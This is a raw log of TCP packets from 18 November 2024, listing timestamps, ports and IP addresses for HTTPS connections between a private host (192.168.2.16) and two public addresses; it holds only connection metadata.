                                                                                                                                                                                            Nov 18, 2024 21:00:07.850452900 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.850527048 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.863996029 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.864089966 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.864367962 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.864439964 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.865741014 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.865766048 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.865812063 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.865829945 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.865854979 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.872041941 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.872076035 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.872124910 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.872910023 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.872984886 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.872999907 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873023987 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873054981 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873075962 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873102903 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873502016 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873569965 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873583078 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.873639107 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.874355078 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.874425888 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.875951052 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.876019001 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.876837969 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.876918077 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.880986929 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881136894 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881195068 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881203890 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881211996 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881356955 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881419897 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881786108 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.881860971 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882169962 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882242918 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882261992 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882339954 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882381916 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882406950 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882430077 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882430077 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882473946 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882745981 CET49774443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882766008 CET4434977466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.882822037 CET49774443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.883322954 CET49774443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.883333921 CET4434977466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.884742975 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.884808064 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.885166883 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.885273933 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.885324001 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.885782003 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.885816097 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.885879993 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.886054993 CET49775443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.886070013 CET4434977566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.891849041 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.892062902 CET49757443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.892074108 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.895211935 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.895277023 CET49757443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.895555019 CET49757443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.895632029 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.895704031 CET49757443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.895710945 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.898272991 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.899365902 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.899425983 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.899444103 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.900743008 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.900825024 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.900837898 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.900895119 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.903336048 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.903354883 CET49756443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.903418064 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.903738976 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.903827906 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.904962063 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.905038118 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.919378996 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922069073 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922167063 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922188044 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922255993 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922369957 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922369957 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922369957 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922673941 CET49776443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922727108 CET4434977666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.922800064 CET49776443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.923224926 CET49776443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.923281908 CET4434977666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.923528910 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.923557997 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.923574924 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.923598051 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.923624992 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.925695896 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.925741911 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.925802946 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.926011086 CET49777443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.926029921 CET4434977766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.931338072 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.935359955 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.935369015 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.935373068 CET49757443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.940967083 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.940990925 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941008091 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941044092 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941090107 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941581964 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941598892 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941612959 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941643953 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.941679955 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.942405939 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.942421913 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.942473888 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.942502022 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.943089962 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.943109989 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.943157911 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.943192005 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.944104910 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.944123030 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.944170952 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.982369900 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.982697010 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.982780933 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:07.992208004 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.992291927 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.992336988 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.992410898 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.992439032 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.992505074 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.992954016 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993021965 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993263960 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993346930 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993571997 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993638992 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993737936 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993805885 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993824005 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.993870020 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.994244099 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.994317055 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.994591951 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.994657993 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.994765997 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.994831085 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996057987 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996123075 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996274948 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996345997 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996365070 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996431112 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996754885 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996917009 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996939898 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996965885 CET44349754157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:07.996988058 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:07.997015953 CET49754443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.003964901 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.004045963 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.004820108 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.004894018 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.005520105 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.005590916 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.006249905 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.006319046 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.007256031 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.007352114 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.008208036 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.008282900 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.009222031 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.009294987 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.010584116 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.010662079 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.019685984 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.019804001 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.019915104 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.020009995 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.020441055 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.020513058 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.021248102 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.021311998 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.021351099 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.021406889 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.021472931 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.021924973 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.021997929 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.022243977 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.022311926 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.039838076 CET4434975666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.039859056 CET4434975666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.039917946 CET4434975666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.039920092 CET49756443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.039969921 CET49756443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.040568113 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.040657043 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.041145086 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.041214943 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.041237116 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.041316986 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.041378021 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.042177916 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.042212963 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.042563915 CET49778443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.042627096 CET4434977866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.042695999 CET49778443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.043473005 CET49778443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.043520927 CET4434977866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.043564081 CET49756443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.043576956 CET4434975666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.068368912 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.068417072 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.068494081 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.068917036 CET49779443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.068933964 CET4434977966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.394620895 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.394764900 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.394865990 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.394889116 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.394963026 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.395622969 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.395695925 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.395716906 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.395736933 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.395770073 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.395790100 CET4434975866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.395802975 CET49758443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396260023 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396277905 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396327972 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396338940 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396346092 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396377087 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396401882 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396423101 CET49757443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396431923 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396435022 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396439075 CET4434975766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396467924 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396485090 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396645069 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.396703005 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397006989 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397036076 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397284985 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397387028 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397422075 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397449970 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397480011 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397486925 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397531033 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397545099 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397608995 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.397958994 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398016930 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398056030 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398109913 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398144007 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398195982 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398266077 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398396969 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398410082 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398436069 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398473024 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398483992 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398508072 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.398530006 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.399049044 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.399108887 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.399142981 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.399190903 CET49755443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:08.399219990 CET44349755157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:08.399276018 CET49755443192.168.2.16157.240.249.63
